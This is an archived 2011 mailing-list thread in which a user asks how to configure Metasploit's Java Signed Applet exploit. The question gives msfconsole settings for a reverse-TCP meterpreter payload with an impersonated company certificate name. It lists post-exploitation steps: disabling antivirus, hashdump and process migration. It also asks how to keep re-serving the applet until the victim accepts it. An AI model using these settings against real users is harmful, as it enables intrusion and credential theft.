mailing list archives
Re: HELP: metasploit v3.8.0-dev (Java UNsigned Applet) and meterpreter AutoRun scripts.
From: Carlos Perez <carlos_perez () darkoperator com>
Date: Sun, 19 Jun 2011 13:28:58 -0400
Your rc file should not be use with multiscript but with the multi console command script
Sent from my iPhone
On Jun 19, 2011, at 12:39 PM, jambunathan sadasivamiyer <jamshuttle77 () gmail com> wrote:
you may get some tips from some of the team member,
On Sun, Jun 19, 2011 at 9:56 PM, Richard Miles <richard.k.miles () googlemail com> wrote:
No one can help me?
On Thu, Jun 16, 2011 at 4:18 PM, Richard Miles
<richard.k.miles () googlemail com> wrote:
1) I want to test the Java Signed Applet, I'm using version metasploit
v3.8.0-dev, I'm following this tutorial:
It works, however I still get it with bad digital signature. Below is
how I'm executing it:
set PAYLOAD windows/meterpreter/reverse_tcp_allports
set AutoRunScript multiscript -s /root/script.rc
set LHOST MyIP
set APPLETNAME CompanyName
set CERTCN Santo CompanyName
set SRVPORT 80
set ExitOnSession false
exploit -j -z
And it works, but I always see on the browser as an unsigned (bad
digital signature). What I'm doing wrong?
b) Also, on my script.rc I have:
But on the output of msfconsole I just see:
meterpreter > run multi_console_command -s /root/dump.rc
[*] Running Command List ...
And I never see the output.
I basically just want to do the following once a connection with
meterpreter is estabilished.
- get a screenshot
- get sysinfo and getuid
- run killav and scraper
- launch getpriv
- execute hashdump
- execute "dir c:\" and "ps".
- call migrate -f (create an notepad and migrate to it)
- sleep 45 seconds and get another screenshot.
Can someone help me how to do it? I want to see all output on the
msfconsole or save locally on the msfconsole machine. How?
C) There is a way to tell metasploit to reload Java Signed Applet
exploit until user click "yes"?
D) I would love to have an .php script doing basic enumeration of my
target before execute Java Signed Applet, there is a way to launch
this exploit in Apache or any other way that I can first execute an
.php scrip and then redirect to the Java Signed Applet exploit?
Thanks a lot.